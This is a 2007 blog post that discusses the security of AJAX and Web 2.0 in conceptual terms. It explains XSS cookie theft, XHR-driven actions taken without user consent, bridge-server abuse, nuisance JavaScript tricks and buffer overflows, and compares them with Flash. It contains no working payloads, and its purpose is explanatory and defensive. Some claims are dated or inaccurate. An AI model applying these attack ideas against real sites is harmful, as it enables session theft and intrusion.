Search This Blog

Wednesday, January 17, 2007

Web 2.0 and AJAX - fundamentally insecure ?



In the past couple of days, I’ve been delving into supposed security issues that the new Web 2.0 and AJAX enabled sites produce and have been also looking into some claims I heard that for serious applications, one should stick to Flash, since it is inherently more secure, tried and tested than AJAX is today.

To investigate the inherent and publicized security issues within AJAX, we first need to understand the underlying technologies that AJAX uses. Specifically, AJAX comprises of:

a) XMLHttpRequest (XHR)– a new functionality, that has been added to most well known browsers today that allow an asynchronous communication mechanism between the browser and the webserver

b) Client side JavaScript – been around for a long time, an implementation of the ECMA script specification and used as a programming language for many web based applications

To properly assess AJAX related security issues, then, it makes sense for us to take a look at what sort of security issues do these two critical underlying technologies present.

XSS – Cross-Site Scripting attacks – A Javascript and URL handling exploit

The concept here is straight-forward. XSS is not a technology – it refers to a technique, where a malicious user can construct an ‘evil’ input which when passed to a trusted, but vulnerable site, causes that site to compromise it’s users. Consider , for example, a site called www.goodsite.com. Which accepts a search query like so www.goodsite.com/q=mysearch. Now let us assume, that goodsite.com does not do a good job at ensuring that the input provided is validated well. One could construct a URI like www.goodsite/com/q=(insert malicious script code here) and send it off to goodsite. If goodsite let this pass, in effect, the script would be executed in context of the browser session for the user. So, if I were to send you this site URI, and you clicked it, I could for example, hijack your session cookie at goodsite and have it sent to me via embedded javascript (Javascript allows cross-domain HTTP requests). If you think this is trivially avoidable, you’d be surprised at how may ways there are to bypass web server checks. For example, take a look at the myspace exploit that used dynamic HTML and fragmented text blocks to hide substring matches to get caught by the web-server’s parser.

Ideally, one could consider that XSS should be disallowed, or, all webservers MUST ensure that all special characters are ‘safe’ized (encoded using HTML entities) to ensure that they are not interpreted at the remote side, rather, only displayed. However, with the increasing popularity of responsive web sites using AJAX related technologies, Mash-ups are becoming very common, and the ability for one domain to pass on data for remote script execution helps in managing load on the local host. XSS related vulnerabilties have been around for a long time, and have been successful in infecting a variety of web based solutions, including Php boards, google, apache, mozilla, myspace, yahoo and many more.

It is important to note that XSS depends on the following:

a) You somehow pass on a ‘malicious’ URI to a user and get him to click on it (it doesn’t make sense for you to execute the XSS vulnerability in your own browser context, unless you think you can launch a remote exploit due to a buffer underflow or overflow – that is a different attack, and not catagorized under XSS Attacks – more on this later)

b) It makes an assumption that the web-server receiving this information does not do a good job validating input


Effect of Web 2.0 on XSS attacks

Does Web 2.0 impact the risks of XSS attacks? Yes and No. Technically speaking, XSS has nothing to do with Web 2.0 and AJAX. It is a vulnerability that existed much before AJAX as a term was even coined. XSS attacks started surfacing almost as soon as javascript was introduced. However, with the proliferation of Web 2.0 sites, there is a significant increase in collaboration, mash-ups and multi-tenancy which all mean the same thing – there is a larger audience which can now be targetted for vulnerabilities. So the ‘No’ was a technical response. The ‘Yes’ was a market response – due to adoption. However, that is not to say that ‘Web 2.0 results in increased XSS vulnerabilities’. The right statement would be ‘Web 2.0 results in more people using potentially vulnerable techologies, which unless hardened, have a wider possibility of financial and reputation damage’ (heck, sounds like a lawyer crafted that, but you get what I mean). In addition, multi-tenancy (different applications on a single cluster of hosts) means exposed vulnerability of one application can compromise others, unless the multi-tenant host takes very special care of intra-trust-domains (providers usually do a good job of inter-trust-domains, but lag on trust within their own domain, which is why once you get it, you can usually do a lot of damage in periphery nodes).


XMLHttpRequest (XHR) & Javascript Repudiation Attacks

This is really is derivative attack on a compromised site (it is interesting to note most of the attacks rely on implementation gaps of web-servers). Assuming that you manage to get a malicious script code, using XHR you can issue as many HTTP commands in it to automatically, ‘agree to some terms and service’, ‘buy item’ etc. that don’t require any specific user input not known to the environment. The exact same thing is also possible to do with Javascript – so this is not really specific to AJAX only (The only new thing AJAX got in was XHR – Javascript existed much before hat). Since the web-server does not know which request came from an embedded XHR or an explicit user click, it is not possible to differentiate between the two.


Effect of Web 2.0 on Repudiation Attacks

Once again, with the hype and slickness of XHR+JS applications proliferating around the web, more people should concentrate on architectural and data protection besides only focussing on ‘how to make the interface slicker’. So again, Web 2.0 does not technically make the situation worse, but in the surge of trying to get out prettier applications, developers needs to go back to their basics on implementing a secure enviroment for distributed systems and input validation.

(AJAX) Bridging

Bridging is a software concept that has long pre-dated Web 2.0. In effect, it is the process on installing a ‘gateway server’ in between multiple content sources. This ‘gateway server’ maintains a trusted relationship with the backend content servers and is also therefore capable of creating integration logic of how to ‘mesh’ these diverse contents together. This sort of bridging has increased in popularity, with the deployment of mash applications. It introduces another twist to XHR attacks. XHR cannot access HTTP pages which are outside the domain which is being served. For exampl
e, if a script was running at www.google.com, XHR can’t make a HTTP request to www.yahoo.com . However, if the application is being hosted on a bridge server, then one could use the bridge server URI to access content in the other backend site (for example, if the bridge server knowingly or un-knowingly supports URI redirection). Do note that Javascript also supports this capability, so you don’t need XHR for this. However, now that Browsers also support XHR, even if JS is disabled or blocked, one could launch similar exploits without it. What then happens is that by transitive relationship, if Yahoo were to offer its APIs to a trusted site, the users of that trusted site could now target attacks on Yahoo using common tricks like SQL injection, DoS (repeated HTTP requests via XHR in bulk) and similar.

Effect of Web 2.0 on XHR Bridging Attacks

Web based mash-up applications are proliferating today. The use of bridge servers to blend content from multiple sites are getting much more common place today (for instance, mashing google maps with craigslist, house searches and more). In any architecture, the fundamental principle of ‘a chain is only as strong as it’s weakest link’ applies equally here.

Javascript ‘Script Kidde’ Tricks

This is a compendium of many tricks which have plagued immature implementations of Javascript. Many of these tricks are very irritating and can destroy user experience. For example, Pascal Meunier maintains a list of some of these irritants, which work even today on the most recent of browsers, and they include:
a) Dynamically generating a fake page for a valid URI – a simple javascript trick where if you visit http://bad.com and click on a link there for ‘google.com’ it can result in your browser URL changing to google.com but displaying some other crafted page (it works in IE7, FF2.0 smarly displays the URL redirection)
b) Nasty JS code that traps browser events and does not let you navigate away from the page, unless you close the browser

And more.

Ofcourse, JS being a programming language, it can also be used for more serious purposes – like port scanning your own network and potentially reporting found results to an external site.

Effect of Web 2.0 on JS Vulnerabilties

Most of the web 2.0 world relies heavily on Javascript. Infact, I can point you to hundreds of sites, that blindly download ‘JS+XHR (AJAX) toolkits’ like prototype.js or others and start using their functions. Just an an example, prototype.js is a 64KB file densely packed with XHR and JS code. How many people actually look into that file ? What stops me from hosting a malicious prototype.js file and having people download that file and use it in their own context and have their context sensitive information sent out ? With the increasing use of JS in commercial sites in quest for a better user experience, the inherent implementation gaps of JS interpreters in browsers have a capability to do much more damage, simply due to a function of it being used in many more mainstream functions than before.

XHR+JS insecurities vs. Flash

Comparing this to Flash, when I googled around for vulnerabilities, most of them I came across, were to do with buffer exploits. Simply put, buffer exploits are set of techniques where a malicious user finds a spot of executable code that does not check for input length, and using that, provides a large enough string which overflows the allocated stack for that string. In addition to that, the string is crafted with machine opcodes at the right place, which causes the return address from that function to reach an address within that string, which is actually an encoded instruction set. Effectively it means that the remote user has managed to execute code on the remote platform, thereby launching an internal attack. Such attacks are very old and still prevalent. A great tutorial (old, but gold) for buffer exploits can be read here.

So while I found such buffer exploits, I did not have much success in finding actionscript related exploits similar in nature to those mentioned above. I did find references to ramdom posts on forums that said a few years ago, actionscript from Flash was in a similar stage, but it seems over the years, the implementation has improved. Again, this was a cursory look – I’d be happy to be pointed to similar exploits in the Flash world.

Buffer exploits will always remain – detecting and compromising buffer exploits don’t need an open programming language interface like JS. These exploits require more skill to probe and compromise (yes, I am aware of automated buffer exploit scanners, but applying them to different environments requires more skill) and is usually an art for a smaller niche community.

However, in the entire flash vs. AJAX security debate, I do have another concern. JS and XHR exploits need to be fixed by the ‘browser’ owners – Microsoft, Mozilla, Apple and others. Flash exploits need to be fixed by Adobe and can be done independent of the browser, since Flash is a 3rd party browser plugin, while JS and XHR are core browser implementations. I wonder if this would mean that relying on browser companies to fix issues takes a longer time than relying on Adobe to fix a plugin-issue. Anyway, as Web 2.0 with AJAX continues to go mainstream, only time will tell.

Conclusion

What we observe, then, is that most of the vulnerabilties of AJAX are little to do with AJAX and more to do with inherent vulnerabilties of immature implementations and bad architectural choices by developers. Most of the vulnerabilities above boil down to:

a) User Input is not validated well
b) Data Integrity and logical firewalling is not thought out well
c) Current implementations of javascript in browsers is rather dismal
d) If your architecture is insecure, no technology can rescue you

What Web 2.0 is doing is making these technologies mainstream. As more people use it, many more bugs come out, and many more people think of hacking insecure sites for fun and profit (nothing new with that). I think overall, this will be beneficial for the web community - there is nothing like taking a technology mainstream to make it robust ! But in the process, developers and marketeers need to be aware that this is an evolving process and should do everything possible to safeguard their own data from the imperfections in the implementation of their chosen tools.

References
http://namb.la/popular/tech.html
http://ajaxian.com/by/topic/security/
http://www.technicalinfo.net/papers/CSS.html
http://insecure.org/stf/smashstack.html
http://www.actionscripthero.co
m/adventures/

http://www.viruslist.com/en/analysis?pubid=184625030

No comments:

Post a Comment